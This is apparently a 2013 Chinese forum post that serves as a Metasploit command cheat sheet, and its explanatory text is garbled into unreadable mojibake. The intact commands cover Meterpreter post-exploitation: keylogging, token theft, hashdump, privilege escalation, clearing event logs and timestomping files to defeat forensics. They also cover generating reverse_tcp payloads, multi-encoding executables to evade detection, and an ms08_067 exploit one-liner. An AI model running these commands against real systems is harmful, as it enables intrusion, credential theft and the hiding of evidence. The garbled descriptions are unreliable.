admin 2013-3-14 20:31:18

MSFնȫ

http://pan.baidu.com/share/link?shareid=183103&uk=1110131489
show exploits
гmetasploitе͸ģ顣

show payloads
гmetasploitейغɡ

show auxiliary
гmetasploitеиغɡ

search name
metasploitе͸ģ顣

info
չʾƶ͸ģϢ

use name
װһ͸ģ顣

LHOST
㱾ؿĿӵIPַͨĿͬһʱҪһIPַرΪʽshellʹá

RHOST
ԶĿ

set function
ضòEGñػԶ

setg function
ȫַʽضòEGñػԶ

show options
гij͸ģеò

show targets
г͸ֵ֧Ŀƽ̨

set target num
ָ֪ĿIJϵͳԼ汾͡

set payload name
ָҪʹõĹغɡ

show advanced
ги߼ѡ

set autorunscript migrate -f
͸ɺ󣬽ԶǨƵһ̡

check
ĿǷѡ͸Ӧİȫ©

exploit
ִ͸ģĿꡣ

exploit -j
ڼƻ½͸ں̨У

exploit -z
͸ɺػн

exploit -e encoder
ƶʹõĹغɱ뷽ʽEGexploit -e shikata_ga_nai

exploit -h
гexploitİϢ

sessions -l
гõĽỰڴshellʱʹã

sessions -l -v
гпõĽỰԼϸϢEGϵͳʱʹĸȫ©

sessions -s script
лԾmetasploitỰһضmetasploitű

sessions -K
ɱлԾĽỰ

sessions -c cmd
лԾmetasploitỰִһ

sessions -u sessionID
һͨwin32 shellmetasploit shell

db_create name
һݿҪʹõݿ⣨EGdb_create autopwn

db_connect name
һݿҪʹõݿ⣨EGdb_connect user:passwd@ip/sqlname

db_nmap
nmapɨݴ洢ݿУ֧ͨnmap䣬EG-sT -v -P0

db_autopwn -h
չʾdb_autopwnİϢ

db_autopwn -p -r -e
зֵĿŶ˿ִdb_autopwnϵͳʹһʽshell

db_destroy
ɾǰݿ⡣

db_destroy userpasswd@hostport/database
ʹø߼ѡɾݿ⡣

***metasploit***
help
meterpreterʹð

run scriptname
meterpreterűscripts/meterpreterĿ¼¿ɲ鿴нű

sysinfo
гܿϵͳϢ

ls
гĿļļϢ

use priv
Ȩչģ飬չmetasploit⡣

ps
ʾеĽԼû˻

migrate PID
ǨƵһָĽIDPIDſͨpsϻã

use incognito
incognitoܣĿƻðû

list_tokens -u
гĿûĿơ

list_tokens -g
гĿûĿơ

impersonate_token DOMAIN_NAME\\USERNAME
ðĿϵĿơ

steal_token PID
Ը̵ĿƲƼð

drop_token
ֹͣðǰơ

getsystem
ֹͨϵͳûȨޡ

execute -f cmd.exe -i
ִcmd.exeн

execute -f cmd.exe -i -t
пִcmdظý̡

rev2self
صĿijʼû˻¡

reg command
ĿעннɾѯȲ

setdesktop number
лһû棨ùܻЩûѵ¼

screenshot
ĿĻнͼ

upload file
Ŀϴļ

download file
Ŀļ

keyscan_start
ԶĿ̼¼ܡ

keyscan_dump
洢Ŀϲļ̼¼

keyscan_stop
ֹͣĿļ̼¼

getprivs
ܶĻȡĿϵȨ

uictl enable keyboard/mouse
ӹĿļ̺ꡣ

background
㵱ǰmetasploit shellתΪִ̨С

hashdump
ĿеĿϣֵ

use sniffer
̽ģʽ

sniffer_interfaces
гĿпŵ˿ڡ

sniffer_dump interfaceID pcapname
Ŀ̽

sniffer_start interfaceID packet-buffer
ĿضΧݰ̽

sniffer_stats interfaceID
ȡʵʩ̽ӿڵͳݡ

sniffer_stop interfaceID
ֹͣ̽

add_user username password -h ip
ԶĿһû

clearev
Ŀϵ־¼

timestomp
޸ļԣ޸ļĴʱ䣨ȡ֤飩

reboot
Ŀ

***MSFpayload***
msfpayload -h
msfpayloadİϢ

msfpayload windows/meterpreter/bind_tcp O
гwindows/meterpreter/bind_tcp¿õĹغɵκιغɶǿõģ

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.exewindows¿ִг

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
һmetasploitreverse_tcpغɣLHOSTipLPORT䱣ΪΪpayload.rawļmsffencodeʹá

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
һmetasploitreverse_tcpغɣCʽshellcode

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
һmetasploitreverse_tcpغɣ%u뷽ʽjavaScriptַ

***msfencode***
msfencode -h
гmsfencodeİ

msfencode -l
гпõı

msfencode -t (c,elf,exe,java,js_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
ʾ뻺ĸʽ

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
ʹshikata_ga_naipayload.rawļ5룬Ȼ󵼳һΪencoded_payload.exeļ

msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
һֱʽǶױĹغɡ

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
һĸֵshellcodeESIĴֻshellcodeCԸʽ

***MSFcli***
msfcli | grep exploit
г͸ģ顣

msfcli | grep exploit/windows
гwindowsص͸ģ顣

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
IPms08_067_netapi͸bind_tcpغɣPORT˿ڽм
